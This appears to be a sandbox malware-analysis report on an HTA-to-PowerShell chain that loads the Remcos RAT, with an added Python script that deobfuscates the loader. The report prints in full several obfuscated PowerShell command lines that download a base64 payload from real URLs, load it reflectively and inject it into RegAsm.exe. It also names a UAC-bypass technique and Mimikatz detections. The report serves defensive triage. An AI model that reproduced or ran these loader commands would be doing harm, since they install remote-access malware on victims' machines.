Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6128, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress, | 11_2_004167EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 41 times
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 6128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine, Classification label: mal100.rans.troj.spyw.expl.evad.winHTA@19/18@6/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nicemeetingsofpictureclearthingstobe[1].tiff
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Mutant created: \Sessions\1\BaseNamedObjects\Rmc-M3P7YT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avhm3mxt.kyo.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
Source: C:\Windows\SysWOW64\mshta.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: LJ1IZDkHyE.hta, ReversingLabs: Detection: 26%
Source: unknown, Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta"
Source: C:\Windows\SysWOW64\mshta.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
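The last powershell.exe command line in the chain above hides its script behind three layers: the script text is split into dozens of concatenated string literals, every single quote is replaced by the placeholder CNA and every $ sigil by gYF (restored at runtime with .rEPlaCE('CNA',[strIng][CHar]39) and .rEPlaCE('gYF','$')), and the result is piped into a command name assembled from three characters of $env:COMSPEC. The Python script below is an added example written for this report; it is not Joe Sandbox output and not code from the sample. It statically undoes those three layers on the command line exactly as the report records it. It assumes %COMSPEC% has the Windows default value C:\Windows\system32\cmd.exe (the report does not record the sandbox's value), and it reverses the first Invoke() argument because that argument ends in "//:ptth"; treating it as a back-to-front string is my interpretation of how the loader consumes it, not something the report states.

```python
import re

# Constructed input: the obfuscated -command argument as recorded in the
# report's "Process created" line for the powershell.exe > powershell.exe hop.
OBFUSCATED = r"""
('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')
""".strip()

# Assumption: the sandbox's %COMSPEC% is the Windows default. The report does
# not record it, so the sink resolved below is only valid under this value.
ASSUMED_COMSPEC = r"C:\Windows\system32\cmd.exe"


def join_concatenation(expr: str) -> str:
    """Evaluate the ('a'+'b'+...) group that precedes the first .Replace()."""
    m = re.search(r"\((.*?)\)\.replace\(", expr, flags=re.IGNORECASE | re.DOTALL)
    if not m:
        raise ValueError("no concatenation group found")
    # The pieces are plain single-quoted literals (quotes are placeholders), so
    # pulling every '...' in order and joining them is the whole evaluation.
    return "".join(re.findall(r"'([^']*)'", m.group(1)))


def apply_replace_chain(expr: str, text: str) -> str:
    """Apply each .Replace('old', new) in order; new is a literal or [char]N."""
    pattern = re.compile(
        r"\.replace\('([^']*)'\s*,\s*(?:(?:\[string\])?\[char\](\d+)|'([^']*)')\)",
        re.IGNORECASE,
    )
    for old, char_code, literal in pattern.findall(expr):
        new = chr(int(char_code)) if char_code else literal
        text = text.replace(old, new)  # .NET String.Replace is case-sensitive
    return text


def resolve_comspec_sink(expr: str, comspec: str = ASSUMED_COMSPEC) -> str:
    """Rebuild the command name hidden as $env:COMSPEC[i,j,k] -join ''."""
    m = re.search(r"\$env:comspec\[([\d,\s]+)\]", expr, flags=re.IGNORECASE)
    if not m:
        return ""
    return "".join(comspec[int(i)] for i in m.group(1).split(","))


def invoke_arguments(script: str) -> list[str]:
    """Return the string arguments passed to $method.Invoke($null, [object[]]@(...))."""
    m = re.search(r"\[object\[\]\]@\((.*?)\)\)", script, flags=re.IGNORECASE)
    return re.findall(r"'([^']*)'", m.group(1)) if m else []


def deobfuscate(expr: str) -> dict:
    script = apply_replace_chain(expr, join_concatenation(expr))
    args = invoke_arguments(script)
    type_m = re.search(r"GetType\('([^']*)'\)", script)
    meth_m = re.search(r"GetMethod\('([^']*)'\)", script)
    return {
        "sink": resolve_comspec_sink(expr),
        "script": script,
        "stage_url": re.search(r"\$url = '([^']*)'", script).group(1),
        "entry_point": f"{type_m.group(1)}.{meth_m.group(1)}" if type_m and meth_m else "",
        "invoke_args": args,
        # Interpretation, not a fact from the report: the first argument reads
        # backwards ("...//:ptth"), so the loader presumably reverses it.
        "first_arg_reversed": args[0][::-1] if args else "",
    }


if __name__ == "__main__":
    result = deobfuscate(OBFUSCATED)
    print("sink        :", result["sink"])
    print("stage URL   :", result["stage_url"])
    print("entry point :", result["entry_point"])
    print("invoke args :", result["invoke_args"])
    print("arg0 reversed:", result["first_arg_reversed"])
```

Under the assumed COMSPEC the sink is "iex", so the concatenated text is invoked as a script. That script downloads a text file from the archive.org URL, base64-decodes it into a .NET assembly loaded with [Reflection.Assembly]::Load, and calls RunPE.Home.VAI with the reversed URL and "RegAsm" as arguments, which lines up with the RegAsm.exe process the report shows being created with no arguments immediately afterwards and with the Remcos YARA hits in that process. When triaging on a real host, resolve the index trick against that host's actual %COMSPEC% rather than the assumed default, and treat both URLs as indicators to block, not fetch.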
Source: C:\Windows\SysWOW64\mshta.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"
Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
